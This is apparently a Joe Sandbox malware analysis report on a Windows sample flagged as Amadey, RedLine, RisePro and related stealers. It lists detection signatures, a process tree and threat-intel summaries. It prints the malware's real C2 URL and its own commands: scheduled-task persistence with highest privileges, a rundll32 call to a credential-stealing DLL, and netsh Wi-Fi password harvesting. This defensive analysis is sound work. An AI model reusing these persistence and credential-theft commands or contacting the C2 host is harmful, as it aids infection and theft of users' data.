Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1430545
MD5:169d873778a229bcb4f010f87930cb28
SHA1:15d928181a3abe9fc84d21454246676baad444a8
SHA256:f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449
Tags:exe
Infos:

Detection

Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Yara detected zgRAT
.NET source code contains very large array initializations
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3200 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 169D873778A229BCB4F010F87930CB28)
    • explorta.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" MD5: 169D873778A229BCB4F010F87930CB28)
      • b3168c3d9b.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" MD5: 81A8F98229FF9CD694A2CB7389D22EF8)
        • chrome.exe (PID: 1096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 3116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 8708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 10936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • 2531414c80.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
        • schtasks.exe (PID: 8036 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8160 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 9292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • Conhost.exe (PID: 11964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorta.exe (PID: 8804 cmdline: "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" MD5: 169D873778A229BCB4F010F87930CB28)
      • amert.exe (PID: 8380 cmdline: "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe" MD5: 3AB592D71455D47170AB784430AE8102)
  • explorta.exe (PID: 1088 cmdline: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe MD5: 169D873778A229BCB4F010F87930CB28)
  • svchost.exe (PID: 2892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • b3168c3d9b.exe (PID: 8184 cmdline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" MD5: 81A8F98229FF9CD694A2CB7389D22EF8)
    • chrome.exe (PID: 7256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • MPGPH131.exe (PID: 6188 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: A5E341D76C1BE40293C678679CA9A729)
    • WerFault.exe (PID: 11960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • MPGPH131.exe (PID: 2584 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: A5E341D76C1BE40293C678679CA9A729)
    • WerFault.exe (PID: 11944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 2531414c80.exe (PID: 8848 cmdline: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • svchost.exe (PID: 7856 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8384 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 11880 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 11920 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8128 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 11600 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RageMP131.exe (PID: 11696 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • svchost.exe (PID: 12036 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrosha.exe (PID: 12108 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 3AB592D71455D47170AB784430AE8102)
  • b3168c3d9b.exe (PID: 12228 cmdline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" MD5: 81A8F98229FF9CD694A2CB7389D22EF8)
    • chrome.exe (PID: 9452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • 2531414c80.exe (PID: 984 cmdline: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • RageMP131.exe (PID: 11804 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • chrosha.exe (PID: 8660 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 3AB592D71455D47170AB784430AE8102)
    • swiiiii.exe (PID: 12156 cmdline: "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe" MD5: 1C7D0F34BB1D85B5D2C01367CC8F62EF)
      • conhost.exe (PID: 12172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 8412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 5808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 12164 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 12188 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 8180 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorta.exe (PID: 8168 cmdline: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe MD5: 169D873778A229BCB4F010F87930CB28)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://193.233.132.139/sev56rkm/index.php"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\1000150001\NewB.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 13 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
              0000002C.00000003.2631909972.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000000.00000003.1986544625.0000000005350000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000002D.00000002.2674415512.0000000000591000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000003.00000003.2026683858.0000000005140000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 26 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      37.2.chrosha.exe.a00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        44.2.chrosha.exe.a00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          2.2.explorta.exe.590000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            26.2.amert.exe.860000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              3.2.explorta.exe.590000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                Click to see the 2 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe, ProcessId: 3092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3168c3d9b.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe, ProcessId: 3092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3168c3d9b.exe
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 2892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmp
                                Sigma detected: Suspicious Add Scheduled Task Parent
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe, ParentProcessId: 7556, ParentProcessName: 2531414c80.exe, ProcessCommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, ProcessId: 8036, ProcessName: schtasks.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2892, ProcessName: svchost.exe

                                Stealing of Sensitive Information

                                barindex
                                Sigma detected: Capture Wi-Fi password
                                Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 12188, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 8180, ProcessName: netsh.exe

                                Snort Signatures

                                No Snort rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: file.exeAvira: detected
                                Antivirus detection for dropped file
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeAvira: detection malicious, Label: HEUR/AGEN.1360556
                                Found malware configuration
                                Source: explorta.exe.3092.2.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.139/sev56rkm/index.php"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exeReversingLabs: Detection: 44%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exeReversingLabs: Detection: 51%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exeReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dllReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exeReversingLabs: Detection: 30%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exeReversingLabs: Detection: 95%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dllReversingLabs: Detection: 95%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exeReversingLabs: Detection: 21%
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeReversingLabs: Detection: 44%
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exeReversingLabs: Detection: 95%
                                Source: C:\Users\user\AppData\Local\Temp\1000149001\gold.exeReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exeReversingLabs: Detection: 30%
                                Source: C:\Users\user\AppData\Local\Temp\1000208001\install.exeReversingLabs: Detection: 21%
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeReversingLabs: Detection: 44%
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeReversingLabs: Detection: 47%
                                Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 95%
                                Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dllReversingLabs: Detection: 91%
                                Multi AV Scanner detection for submitted file
                                Source: file.exeReversingLabs: Detection: 47%
                                Machine Learning detection for dropped file
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: file.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00833EB0 CryptUnprotectData,CryptUnprotectData,8_2_00833EB0
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0010C2A2 FindFirstFileExW,4_2_0010C2A2
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001468EE FindFirstFileW,FindClose,4_2_001468EE
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_0014698F
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D076
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D3A9
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00149642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00149642
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0014979D
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00149B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00149B2B
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_0013DBBE
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00145C97 FindFirstFileW,FindNextFileW,FindClose,4_2_00145C97
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008333B0 FindFirstFileA,FindNextFileA,8_2_008333B0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00853B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,8_2_00853B20
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007A1F8C FindFirstFileExW,8_2_007A1F8C
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\AppData
